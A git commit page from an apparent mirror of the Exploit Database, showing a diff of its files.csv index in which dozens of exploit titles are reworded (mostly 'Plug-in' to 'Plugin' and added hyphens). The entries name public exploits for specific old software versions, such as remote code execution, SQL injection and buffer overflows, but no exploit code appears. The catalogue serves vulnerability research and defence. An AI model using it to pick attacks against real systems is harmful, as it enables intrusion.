bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-10-02

Browse source 
9 new exploits
This commit is contained in:
Offensive Security 2015-10-02 05:02:31 +00:00
parent 7fcce7a954
commit 09104c8692
25 changed files with 1042 additions and 555 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

79
files.csv
View file

@ -1225,7 +1225,7 @@ id,file,description,date,author,platform,type,port
1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (osx)",2006-02-08,"H D Moore",osx,remote,0
1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0
1482,platforms/php/webapps/1482.php,"SPIP <= 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (non steam) Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0
1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (Non Steam) - Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0
1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager - connector.php) Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0
1485,platforms/php/webapps/1485.php,"RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit",2006-02-09,rgod,php,webapps,0
1486,platforms/linux/remote/1486.c,"Power Daemon <= 2.0.2 (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532
@ -3094,7 +3094,7 @@ id,file,description,date,author,platform,type,port
3427,platforms/linux/local/3427.php,"PHP < 4.4.5 / 5.2.1 - (shmop) SSL RSA Private-Key Disclosure Exploit",2007-03-07,"Stefan Esser",linux,local,0
3428,platforms/php/webapps/3428.txt,"Flat Chat 2.0 (include online.txt) Remote Code Execution Vulnerability",2007-03-07,Dj7xpl,php,webapps,0
3429,platforms/windows/local/3429.php,"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",2007-03-07,N/A,windows,local,0
3430,platforms/windows/dos/3430.html,"Adobe Reader plug-in AcroPDF.dll 8.0.0.0 Resource Consumption",2007-03-08,shinnai,windows,dos,0
3430,platforms/windows/dos/3430.html,"Adobe Reader plugin AcroPDF.dll 8.0.0.0 - Resource Consumption",2007-03-08,shinnai,windows,dos,0
3431,platforms/windows/local/3431.php,"PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC",2007-03-08,rgod,windows,local,0
3432,platforms/windows/dos/3432.pl,"TFTPDWIN Server 0.4.2 - (UDP) Denial of Service Exploit",2007-03-08,"Umesh Wanve",windows,dos,0
3433,platforms/windows/dos/3433.html,"Rediff Toolbar ActiveX Control Remote Denial of Service Exploit",2007-03-08,"Umesh Wanve",windows,dos,0
@ -3818,7 +3818,7 @@ id,file,description,date,author,platform,type,port
4170,platforms/windows/remote/4170.html,"Program Checker (sasatl.dll 1.5.0.531) Javascript Heap Spraying Exploit",2007-07-10,callAX,windows,remote,0
4171,platforms/php/webapps/4171.pl,"Mail Machine <= 3.989 - Local File Inclusion Exploit",2007-07-10,"H4 / XPK",php,webapps,0
4172,platforms/linux/local/4172.c,"Linux Kernel < 2.6.20.2 - IPv6_Getsockopt_Sticky Memory Leak PoC",2007-07-10,dreyer,linux,local,0
4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln",2007-07-11,jmp-esp,php,webapps,0
4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution Vuln",2007-07-11,jmp-esp,php,webapps,0
4174,platforms/php/webapps/4174.txt,"PsNews 1.1 (show.php newspath) Local File Inclusion Vulnerability",2007-07-12,irk4z,php,webapps,0
4175,platforms/multiple/dos/4175.php,"PHP 5.2.3 bz2 com_print_typeinfo() Denial of Service Exploit",2007-07-12,shinnai,multiple,dos,0
4176,platforms/windows/remote/4176.html,"SecureBlackbox (PGPBBox.dll 5.1.0.112) Arbitary Data Write Exploit",2007-07-12,callAX,windows,remote,0
@ -5047,7 +5047,7 @@ id,file,description,date,author,platform,type,port
5414,platforms/php/webapps/5414.txt,"Koobi Pro 6.25 showimages Remote SQL Injection Vulnerability",2008-04-08,S@BUN,php,webapps,0
5415,platforms/php/webapps/5415.txt,"Koobi 4.4/5.4 gallery Remote SQL Injection Vulnerability",2008-04-08,S@BUN,php,webapps,0
5416,platforms/windows/remote/5416.html,"IBiz E-Banking Integrator 2.0 - ActiveX Edition Insecure Method Exploit",2008-04-09,shinnai,windows,remote,0
5417,platforms/php/webapps/5417.htm,"phpBB Add-on Fishing Cat Portal Remote File Inclusion Exploit",2008-04-09,bd0rk,php,webapps,0
5417,platforms/php/webapps/5417.htm,"phpBB Addon Fishing Cat Portal - Remote File Inclusion Exploit",2008-04-09,bd0rk,php,webapps,0
5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin Exploit",2008-04-09,t0pP8uZz,php,webapps,0
5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - (path) File Disclosure Vulnerability",2008-04-09,JIKO,php,webapps,0
5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version (file) - Remote File Disclosure Vulnerability",2008-04-09,HaCkeR_EgY,php,webapps,0
@ -8414,7 +8414,7 @@ id,file,description,date,author,platform,type,port
8919,platforms/php/webapps/8919.txt,"Joomla Component com_realestatemanager 1.0 RFI Vulnerability",2009-06-09,"Mehmet Ince",php,webapps,0
8920,platforms/php/webapps/8920.txt,"Joomla Component com_vehiclemanager 1.0 RFI Vulnerability",2009-06-09,"Mehmet Ince",php,webapps,0
8921,platforms/php/webapps/8921.sh,"phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit",2009-06-09,"Adrian ""pagvac"" Pastor",php,webapps,0
8922,platforms/windows/remote/8922.txt,"DX Studio Player < 3.0.29.1 Firefox plug-in Command Injection Vuln",2009-06-10,"Core Security",windows,remote,0
8922,platforms/windows/remote/8922.txt,"DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection Vuln",2009-06-10,"Core Security",windows,remote,0
8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db <= 2.2.x system Config Disclosure Exploit",2009-06-10,StAkeR,php,webapps,0
8924,platforms/php/webapps/8924.txt,"School Data Navigator (page) Local/Remote File Inclusion Vulnerability",2009-06-10,Br0ly,php,webapps,0
8925,platforms/php/webapps/8925.txt,"Desi Short URL Script (Auth Bypass) Insecure Cookie Handling Vuln",2009-06-10,N@bilX,php,webapps,0
@ -8456,7 +8456,7 @@ id,file,description,date,author,platform,type,port
8962,platforms/php/webapps/8962.txt,"phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln",2009-06-15,SirGod,php,webapps,0
8963,platforms/hardware/remote/8963.txt,"Netgear DG632 Router Authentication Bypass Vulnerability",2009-06-15,"Tom Neaves",hardware,remote,0
8964,platforms/hardware/dos/8964.txt,"Netgear DG632 Router Remote Denial of Service Vulnerability",2009-06-15,"Tom Neaves",hardware,dos,0
8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player Add-On HTML Injection Vulnerability",2009-06-15,d3v1l,php,webapps,0
8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player AddOn - HTML Injection Vulnerability",2009-06-15,d3v1l,php,webapps,0
8966,platforms/php/webapps/8966.txt,"phportal 1 - (topicler.php id) Remote SQL Injection Vulnerability",2009-06-15,"Mehmet Ince",php,webapps,0
8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 - Remote XSS Vulnerability",2009-06-15,"ThE g0bL!N",php,webapps,0
8968,platforms/php/webapps/8968.txt,"Joomla Component com_jumi (fileid) Blind SQL Injection Exploit",2009-06-15,"Chip d3 bi0s",php,webapps,0
@ -12475,7 +12475,7 @@ id,file,description,date,author,platform,type,port
14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0
14185,platforms/multiple/dos/14185.py,"ISC-DHCPD Denial of Service",2010-07-03,sid,multiple,dos,0
14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0
14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting Add-On Remote File Inclusion Vulnerability",2010-07-03,lumut--,php,webapps,0
14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting AddOn - Remote File Inclusion Vulnerability",2010-07-03,lumut--,php,webapps,0
14187,platforms/php/webapps/14187.txt,"Joomla eventcal Component 1.6.4 com_eventcal Blind SQL Injection Vulnerability",2010-07-03,RoAd_KiLlEr,php,webapps,0
14188,platforms/php/webapps/14188.html,"Cpanel 11.25 - CSRF Add FTP Account Exploit",2010-07-03,G0D-F4Th3r,php,webapps,0
14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL); - XOR 88 encoded (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0
@ -16402,7 +16402,7 @@ id,file,description,date,author,platform,type,port
18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow",2012-06-01,metasploit,windows,remote,0
18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 Format PlugIn TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0
18973,platforms/windows/remote/18973.rb,"GIMP script-fu Server Buffer Overflow",2012-06-02,metasploit,windows,remote,0
18974,platforms/php/webapps/18974.txt,"vanilla forum tagging plug-in enchanced 1.0.1 - Stored XSS",2012-06-02,"Henry Hoggard",php,webapps,0
18974,platforms/php/webapps/18974.txt,"Vanilla Forum Tagging Plugin Enchanced 1.0.1 - Stored XSS",2012-06-02,"Henry Hoggard",php,webapps,0
18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog <= 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0
18987,platforms/php/webapps/18987.php,"Wordpress WP-Property Plugin 1.35.0 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0
18988,platforms/php/webapps/18988.php,"Wordpress Plugin Marketplace Plugin 1.5.0 - 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0
@ -19395,11 +19395,11 @@ id,file,description,date,author,platform,type,port
22135,platforms/linux/remote/22135.c,"TANne 0.6.17 Session Manager SysLog Format String Vulnerability",2003-01-07,"dong-h0un yoU",linux,remote,0
22136,platforms/windows/remote/22136.txt,"PlatinumFTPServer 1.0.6 Dot-Dot-Slash Directory Traversal Vulnerability",2003-01-07,"Dennis Rand",windows,remote,0
22137,platforms/cgi/webapps/22137.txt,"FormMail-Clone Cross-Site Scripting Vulnerability",2003-01-09,"Rynho Zeros Web",cgi,webapps,0
22138,platforms/multiple/remote/22138.c,"Half-Life StatsMe 2.6.x Plug-in CMD_ARGV Buffer Overflow Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
22139,platforms/multiple/remote/22139.c,"Half-Life ClanMod 1.80/1.81 Plugin Remote Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
22140,platforms/multiple/remote/22140.c,"Half-Life StatsMe 2.6.x Plug-in MakeStats Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
22141,platforms/linux/remote/22141.c,"Half-Life AdminMod 2.50 Plugin Remote Format String Vulnerability",2003-01-10,greuff,linux,remote,0
22142,platforms/windows/remote/22142.c,"Half-Life 1.1 Client Server Message Format String Vulnerability",2003-01-10,greuff,windows,remote,0
22138,platforms/multiple/remote/22138.c,"Half-Life StatsMe 2.6.x Plugin - CMD_ARGV Buffer Overflow Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
22139,platforms/multiple/remote/22139.c,"Half-Life ClanMod 1.80/1.81 Plugin - Remote Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
22140,platforms/multiple/remote/22140.c,"Half-Life StatsMe 2.6.x Plugin - MakeStats Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
22141,platforms/linux/remote/22141.c,"Half-Life AdminMod 2.50 Plugin - Remote Format String Vulnerability",2003-01-10,greuff,linux,remote,0
22142,platforms/windows/remote/22142.c,"Half-Life 1.1 Client - Server Message Format String Vulnerability",2003-01-10,greuff,windows,remote,0
22143,platforms/linux/remote/22143.txt,"BRS WebWeaver 1.0 1 MKDir Directory Traversal Weakness",2003-01-10,euronymous,linux,remote,0
22144,platforms/windows/remote/22144.txt,"Xynph FTP Server 1.0 Relative Path Directory Traversal Vulnerability",2003-01-11,"Zero-X www.lobnan.de Team",windows,remote,0
22145,platforms/multiple/remote/22145.txt,"BitMover BitKeeper 3.0 Daemon Mode Remote Command Execution Vulnerability",2003-01-11,"Maurycy Prodeus ",multiple,remote,0
@ -20176,10 +20176,10 @@ id,file,description,date,author,platform,type,port
22963,platforms/cgi/webapps/22963.txt,"Softshoe Parse-file Cross-Site Scripting Vulnerability",2003-07-28,"Bahaa Naamneh",cgi,webapps,0
22964,platforms/unix/remote/22964.c,"Mini SQL 1.0/1.3 - Remote Format String Vulnerability",2003-07-28,lucipher,unix,remote,0
22965,platforms/linux/local/22965.c,"XBlast 2.6.1 HOME Environment Variable Buffer Overflow Vulnerability",2003-07-28,c0wboy,linux,local,0
22966,platforms/windows/remote/22966.c,"Valve Software Half-Life 1.1 Client Connection Routine Buffer Overflow Vulnerability (1)",2003-07-29,D4rkGr3y,windows,remote,0
22966,platforms/windows/remote/22966.c,"Valve Software Half-Life 1.1 Client - Connection Routine Buffer Overflow Vulnerability (1)",2003-07-29,D4rkGr3y,windows,remote,0
22940,platforms/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting Vulnerability",2003-07-21,"Ferruh Mavituna",php,webapps,0
22941,platforms/php/webapps/22941.txt,"atomicboard 0.6.2 - Directory Traversal Vulnerability",2003-07-21,gr00vy,php,webapps,0
22967,platforms/windows/remote/22967.txt,"Valve Software Half-Life 1.1 Client Connection Routine Buffer Overflow Vulnerability (2)",2003-07-29,anonymous,windows,remote,0
22967,platforms/windows/remote/22967.txt,"Valve Software Half-Life 1.1 Client - Connection Routine Buffer Overflow Vulnerability (2)",2003-07-29,anonymous,windows,remote,0
22968,platforms/linux/remote/22968.c,"Valve Software Half-Life Server <= 1.1.1.0 & 3.1.1.1c1 &4.1.1.1a - Multiplayer Request Buffer Overflow",2003-07-29,hkvig,linux,remote,0
22917,platforms/windows/remote/22917.txt,"Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability",2003-08-11,aT4r@3wdesign.es,windows,remote,0
22918,platforms/unix/dos/22918.txt,"IBM U2 UniVerse 10.0.0.9 - uvrestore Buffer Overflow Vulnerability",2003-07-16,kf,unix,dos,0
@ -20424,7 +20424,7 @@ id,file,description,date,author,platform,type,port
23195,platforms/asp/webapps/23195.txt,"Alan Ward A-Cart 2.0 MSG Cross-Site Scripting Vulnerability",2003-09-29,G00db0y,asp,webapps,0
23196,platforms/linux/remote/23196.c,"WebFS 1.x Long Pathname Buffer Overrun Vulnerability",2003-09-29,jsk,linux,remote,0
23197,platforms/linux/local/23197.c,"Mah-Jong 1.4 MJ-Player Server Flag Local Buffer Overflow Vulnerability",2003-09-29,jsk,linux,local,0
23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 Invalid Command Error Response Format String Vulnerability",2003-09-29,"Luigi Auriemma",windows,remote,0
23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 - Invalid Command Error Response Format String Vulnerability",2003-09-29,"Luigi Auriemma",windows,remote,0
23199,platforms/multiple/remote/23199.c,"OpenSSL ASN.1 Parsing Vulnerabilities",2003-10-09,Syzop,multiple,remote,0
23200,platforms/linux/dos/23200.txt,"Gamespy 3d 2.62/2.63 IRC Client Remote Buffer Overflow Vulnerability",2003-09-30,"Luigi Auriemma",linux,dos,0
23201,platforms/windows/dos/23201.txt,"VLC Media Player 2.0.4 - (.swf) Crash PoC",2012-12-07,coolkaveh,windows,dos,0
@ -20491,12 +20491,12 @@ id,file,description,date,author,platform,type,port
23262,platforms/jsp/webapps/23262.txt,"Caucho Resin 2.0/2.1 - Multiple HTML Injection and Cross-Site Scripting Vulnerabilities",2003-10-20,"Donnie Werner",jsp,webapps,0
23263,platforms/multiple/dos/23263.txt,"Opera 7.11/7.20 HREF Malformed Server Name Heap Corruption Vulnerability",2003-10-20,@stake,multiple,dos,0
23264,platforms/php/webapps/23264.txt,"DeskPro 1.1 - Multiple SQL Injection Vulnerabilities",2003-10-20,"Aviram Jenik",php,webapps,0
23265,platforms/windows/remote/23265.txt,"Sun Java Plug-In 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation Vulnerability",2003-10-20,"Marc Schoenefeld",windows,remote,0
23265,platforms/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation Vulnerability",2003-10-20,"Marc Schoenefeld",windows,remote,0
23266,platforms/cgi/webapps/23266.txt,"Dansie Shopping Cart Server Error Message Installation Path Disclosure Vulnerability",2003-10-20,Dr`Ponidi,cgi,webapps,0
23267,platforms/windows/dos/23267.txt,"Atrium Software Mercur Mailserver 3.3/4.0/4.2 IMAP AUTH Remote Buffer Overflow Vulnerability",2003-10-20,"Kostya KORTCHINSKY",windows,dos,0
23268,platforms/java/webapps/23268.txt,"Vivisimo Clustering Engine - Search Script Cross-Site Scripting Vulnerability",2003-10-21,ComSec,java,webapps,0
23269,platforms/php/webapps/23269.txt,"FuzzyMonkey 2.11 MyClassifieds Email Variable SQL Injection Vulnerability",2003-10-21,Ezhilan,php,webapps,0
23270,platforms/windows/remote/23270.java,"Sun Java Plug-In 1.4 Unauthorized Java Applet Floppy Access Weakness",2003-10-21,"Marc Schoenefeld",windows,remote,0
23270,platforms/windows/remote/23270.java,"Sun Java Plugin 1.4 - Unauthorized Java Applet Floppy Access Weakness",2003-10-21,"Marc Schoenefeld",windows,remote,0
23271,platforms/multiple/remote/23271.txt,"PSCS VPOP3 2.0 Email Server WebAdmin Cross-Site Scripting Vulnerability",2003-10-22,SecuriTeam,multiple,remote,0
23272,platforms/solaris/remote/23272.txt,"Sun Management Center 3.0/3.5 Error Message Information Disclosure Vulnerability",2003-10-22,"Jon Hart",solaris,remote,0
23273,platforms/windows/dos/23273.html,"Microsoft Internet Explorer 6.0 Scrollbar-Base-Color Partial Denial of Service Vulnerability",2003-10-22,"Andreas Boeckler",windows,dos,0
@ -20504,7 +20504,7 @@ id,file,description,date,author,platform,type,port
23275,platforms/cgi/webapps/23275.txt,"DansGuardian 2.2.x Denied URL Cross-Site Scripting Vulnerability",2003-10-22,"Richard Maudsley",cgi,webapps,0
23276,platforms/multiple/dos/23276.java,"Sun Java Virtual Machine 1.x Slash Path Security Model Circumvention Vulnerability",2003-10-22,"Last Stage of Delirium",multiple,dos,0
23387,platforms/windows/remote/23387.txt,"netserve Web server 1.0.7 - Directory Traversal Vulnerability",2003-11-17,nimber@designer.ru,windows,remote,0
23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 Information Disclosure/DOS Vulnerability",2003-11-19,3APA3A,windows,dos,0
23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 - Information Disclosure/DOS Vulnerability",2003-11-19,3APA3A,windows,dos,0
23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 sysctl Local Denial of Service Vulnerability",2003-11-19,anonymous,openbsd,dos,0
23279,platforms/windows/dos/23279.txt,"DIMIN Viewer 5.4.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0
23280,platforms/windows/dos/23280.txt,"FreeVimager 4.1.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0
@ -21114,7 +21114,7 @@ id,file,description,date,author,platform,type,port
23909,platforms/windows/remote/23909.txt,"ada imgsvr 0.4 - Directory Traversal Vulnerability",2004-04-05,dr_insane,windows,remote,0
23910,platforms/windows/local/23910.txt,"F-Secure BackWeb 6.31 - Local Privilege Escalation Vulnerability",2004-04-06,"Ian Vitek",windows,local,0
23911,platforms/windows/dos/23911.txt,"Microsoft Internet Explorer 6.0 MSWebDVD Object Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0
23912,platforms/windows/dos/23912.txt,"Microsoft Internet Explorer 6.0 Macromedia Flash Player Plug-in Remote Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0
23912,platforms/windows/dos/23912.txt,"Microsoft Internet Explorer 6.0 Macromedia Flash Player Plugin - Remote Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0
23913,platforms/cgi/webapps/23913.txt,"Floosietek FTGate Mail Server 1.2 index.fts folder Parameter XSS",2004-04-06,dr_insane,cgi,webapps,0
23914,platforms/cgi/webapps/23914.txt,"Floosietek FTGate Mail Server 1.2 Path Disclosure Vulnerability",2004-04-06,dr_insane,cgi,webapps,0
23915,platforms/windows/dos/23915.txt,"Adobe Photoshop 8.0 COM Objects Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0
@ -21193,7 +21193,7 @@ id,file,description,date,author,platform,type,port
23998,platforms/php/webapps/23998.txt,"PHP-Nuke 6.x/7.x - Multiple SQL Injection Vulnerabilities",2004-04-13,waraxe,php,webapps,0
23999,platforms/linux/dos/23999.txt,"Neon WebDAV Client Library 0.2x Format String Vulnerabilities",2004-04-14,"Thomas Wana",linux,dos,0
24000,platforms/windows/dos/24000.pl,"Qualcomm Eudora 6.0.3 MIME Message Nesting Denial of Service Vulnerability",2004-04-14,"Paul Szabo",windows,dos,0
23993,platforms/php/webapps/23993.txt,"websitebaker add-on concert calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps,0
23993,platforms/php/webapps/23993.txt,"Websitebaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps,0
23994,platforms/php/webapps/23994.txt,"Free Blog 1.0 - Multiple Vulnerabilities",2013-01-09,"cr4wl3r ",php,webapps,0
23995,platforms/hardware/webapps/23995.txt,"Watson Management Console 4.11.2.G Directory Traversal Vulnerability",2013-01-09,"Dhruv Shah",hardware,webapps,0
23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - (.jpeg) Exploit",2013-01-09,"Debasish Mandal",windows,local,0
@ -21576,7 +21576,7 @@ id,file,description,date,author,platform,type,port
24385,platforms/asp/webapps/24385.txt,"Zixforum ZixForum.mdb Database Disclosure Vulnerability",2004-07-19,"Security .Net Information",asp,webapps,0
24386,platforms/multiple/dos/24386.txt,"British National Corpus SARA - Remote Buffer Overflow Vulnerability",2004-07-20,"Matthias Bethke",multiple,dos,0
24387,platforms/multiple/remote/24387.txt,"Nihuo Web Log Analyzer 1.6 HTML Injection Vulnerability",2004-08-20,"Audun Larsen",multiple,remote,0
24388,platforms/multiple/dos/24388.txt,"aGSM 2.35 Half-Life Server Info Response Buffer Overflow Vulnerability",2004-08-20,Dimetrius,multiple,dos,0
24388,platforms/multiple/dos/24388.txt,"aGSM 2.35 Half-Life Server - Info Response Buffer Overflow Vulnerability",2004-08-20,Dimetrius,multiple,dos,0
24389,platforms/php/webapps/24389.txt,"Sympa 4.x New List HTML Injection Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0
24390,platforms/php/webapps/24390.txt,"Mantis 0.19 - Remote Server-Side Script Execution Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0
24391,platforms/php/webapps/24391.txt,"Mantis 0.x - Multiple Cross-Site Scripting Vulnerabilities",2004-08-21,"Jose Antonio",php,webapps,0
@ -21922,7 +21922,7 @@ id,file,description,date,author,platform,type,port
24760,platforms/hardware/remote/24760.txt,"ZyXEL 3 Prestige Router HTTP Remote Administration Configuration Reset Vulnerability",2004-11-22,"Francisco Canela",hardware,remote,0
24761,platforms/multiple/dos/24761.txt,"Gearbox Software Halo Game 1.x Client Remote Denial of Service Vulnerability",2004-11-22,"Luigi Auriemma",multiple,dos,0
24762,platforms/php/webapps/24762.txt,"PHPKIT 1.6 - Multiple Input Validation Vulnerabilities",2004-11-22,Steve,php,webapps,0
24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plug-in JavaScript Security Restriction Bypass Vulnerability",2004-11-22,"Jouko Pynnonen",multiple,dos,0
24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plugin - JavaScript Security Restriction Bypass Vulnerability",2004-11-22,"Jouko Pynnonen",multiple,dos,0
24854,platforms/php/dos/24854.txt,"PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (1)",2004-12-15,"Stefan Esser",php,dos,0
24766,platforms/php/webapps/24766.txt,"NuKed-Klan 1.x Submit Link Function HTML Injection Vulnerability",2004-11-23,XioNoX,php,webapps,0
24767,platforms/windows/remote/24767.txt,"Raven Software Soldier Of Fortune 2 - Buffer Overflow Vulnerability",2004-11-23,"Luigi Auriemma",windows,remote,0
@ -22855,7 +22855,7 @@ id,file,description,date,author,platform,type,port
25707,platforms/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure Vulnerability",2005-05-26,"Markku-Juhani O. Saarinen",linux,local,0
25708,platforms/multiple/remote/25708.txt,"Clever's Games Terminator 3: War of the Machines 1.16 Server Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0
25709,platforms/linux/local/25709.sh,"Gentoo Webapp-Config 1.10 Insecure File Creation Vulnerability",2005-05-26,"Eric Romang",linux,local,0
25710,platforms/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plug-in Read_TCP_String Remote Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0
25710,platforms/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plugin - Read_TCP_String Remote Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0
25711,platforms/hardware/dos/25711.txt,"Sony Ericsson P900 Beamer Malformed File Name Handling Denial of Service Vulnerability",2005-05-26,"Marek Bialoglowy",hardware,dos,0
25712,platforms/windows/dos/25712.txt,"SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite RCE",2013-05-26,rgod,windows,dos,0
25713,platforms/windows/remote/25713.txt,"SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx RCE",2013-05-26,rgod,windows,remote,0
@ -23097,7 +23097,7 @@ id,file,description,date,author,platform,type,port
25945,platforms/php/webapps/25945.txt,"phpWebsite 0.7.3/0.8.x/0.9.x Index.PHP Directory Traversal Vulnerability",2005-07-06,"Diabolic Crab",php,webapps,0
25946,platforms/jsp/webapps/25946.txt,"McAfee IntruShield Security Management System Multiple Vulnerabilities",2005-07-06,c0ntex,jsp,webapps,0
25947,platforms/linux/local/25947.txt,"GNU GNATS 4.0/4.1 - Gen-Index Arbitrary Local File Disclosure/Overwrite Vulnerability",2005-07-06,pi3ki31ny,linux,local,0
25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 Plug-In Insecure File Download Handling Vulnerability",2005-07-06,c0ntex,cgi,webapps,0
25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 PlugIn - Insecure File Download Handling Vulnerability",2005-07-06,c0ntex,cgi,webapps,0
25951,platforms/php/webapps/25951.txt,"Elemental Software CartWIZ 1.20 - Multiple SQL Injection Vulnerabilities",2005-07-07,"Diabolic Crab",php,webapps,0
25952,platforms/cgi/webapps/25952.txt,"Pngren 2.0.1 Kaiseki.CGI Remote Command Execution Vulnerability",2005-07-07,blahplok,cgi,webapps,0
25953,platforms/asp/webapps/25953.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple SQL Injection Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0
@ -25693,7 +25693,7 @@ id,file,description,date,author,platform,type,port
28636,platforms/php/webapps/28636.txt,"Grayscale BandSite CMS 1.1 shows_content.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0
28637,platforms/php/webapps/28637.txt,"Grayscale BandSite CMS 1.1 signgbook_content.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0
28638,platforms/php/webapps/28638.txt,"Grayscale BandSite CMS 1.1 footer.php this_year Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0
28639,platforms/linux/remote/28639.rb,"Apple QuickTime 7.1.3 Plug-In Arbitrary Script Execution Weakness",2006-09-21,LMH,linux,remote,0
28639,platforms/linux/remote/28639.rb,"Apple QuickTime 7.1.3 PlugIn - Arbitrary Script Execution Weakness",2006-09-21,LMH,linux,remote,0
28640,platforms/windows/remote/28640.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Web Server Path Disclosure",2006-09-21,"Patrick Webster",windows,remote,0
28641,platforms/windows/remote/28641.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Unspecified Arbitrary File Manipulation",2006-09-21,"Patrick Webster",windows,remote,0
28642,platforms/windows/remote/28642.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Audit Event System Unspecified Replay Attack",2006-09-21,"Patrick Webster",windows,remote,0
@ -27154,7 +27154,7 @@ id,file,description,date,author,platform,type,port
